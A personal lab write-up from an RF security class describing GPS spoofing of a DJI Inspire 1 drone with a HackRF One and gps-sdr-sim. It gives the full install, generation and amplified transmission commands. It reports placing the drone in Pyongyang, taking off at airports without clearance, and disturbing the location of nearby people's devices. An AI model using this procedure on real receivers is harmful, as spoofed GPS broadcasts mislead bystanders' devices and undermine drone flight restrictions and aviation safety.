DJI Inspire 1 GPS spoofing
Introduction
I got a week class on RF security we ended up with some ideas to try. One of them was to spoof the GPS signal on various devices
The device that I decided to target was my DJI Inspire 1 drone
Configuring the HackRF for KALI Linux
The first step is to be able to use the HackRF device with our Virtual Machine
┌──(kali㉿kali)-[~/GPS_SPOOF/gps-sdr-sim]
└─$ sudo apt install hackrf
┌──(kali㉿kali)-[~/GPS_SPOOF/gps-sdr-sim]
└─$ sudo hackrf_info
Installation of GPS Spoof
The next step is to install GPS Spoof to generate the data that will simulate our GPS constellation and that we will send to our device
┌──(kali㉿kali)-[~/GPS_SPOOF/gps-sdr-sim]
└─$ mkdir GPS_SPOOF
┌──(kali㉿kali)-[~/GPS_SPOOF/gps-sdr-sim]
└─$ cd GPS_SPOOF
┌──(kali㉿kali)-[~/GPS_SPOOF/gps-sdr-sim]
└─$ sudo git clone https://github.com/osqzss/gps-sdr-sim.git
┌──(kali㉿kali)-[~/GPS_SPOOF/gps-sdr-sim]
└─$ cd gps-sdr-sim
┌──(kali㉿kali)-[~/GPS_SPOOF/gps-sdr-sim]
└─$ sudo gcc gpssim.c -lm -O3 -o gps-sdr-sim -DUSER_MOTION_SIZE=4000
https://github.com/osqzss/gps-sdr-sim
Time to create our fake constellation
Getting the real GPS constellation informations
To create our fake constellation, we need to locate the teal GPS satellite. This is done through the use of the GPS broadcast ephemeris file. The archive of the daily file can be downloaded here :
These files are used to generate a simulated pseudorange and Doppler for the satellites in range.
This data is then used to create a simulated range data to generate digitized I/Q samples for the GPS signal.
Finding the desired location
Then, select a location you want to spoof. In my case, I want to appear to be in north korea, specifically at Kumnung Tunnel, in Pyongyang.
You can go to Google maps to get the GPS coordinates. In my case, the coordinates are
39.035688, 125.753282Generating the fake constellation
to start to generate the GPS spoof, I used the following command with the ephemeris file and the GPS coordinates as follow
┌──(kali㉿kali)-[~/GPS_SPOOF/gps-sdr-sim]
└─$ sudo ./gps-sdr-sim -b 8 -e ../../Desktop/brdc1450.23n -l "39.035688, 125.753282, 100"
This will create a file called gpssim.bin. This file once played over the HackRF will simulate the GPS constellation
Let’s travel !
To send the freshly generated file to the HackRF One and by extension to our drone here is the commande used
┌──(kali㉿kali)-[~/GPS_SPOOF/gps-sdr-sim]
└─$ sudo hackrf_transfer -t gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 0
Setting up the lab
The setup it the following: My laptop running a KALI Linux VM is connected to a HackFR One. The output of the HackRF One is plugged to a +20Db amplifier and then a 1.5m antenna
Results on the Inspire 1
Traveling around the world
Here it was in Pyongyang North Korea
We also made it to japan
We also encoutered some weird movements while trying to reach japan, and ended up near Tunisia for some unknown reason.
Let’s fly in restricted places
We also tried to move it to some random airports to see if it would let us take of
And turns out they asks us if we have clearance to take of
However if I say I don’t have clearance the drone can take off anyways
Unexpected side effects
The other persons in the room quickly noticed some side effects of this constellation simulation, most of the application using localisation where using the simulated constellation instead of the official one. Multiple locations have been tried during the day, here are some of the results
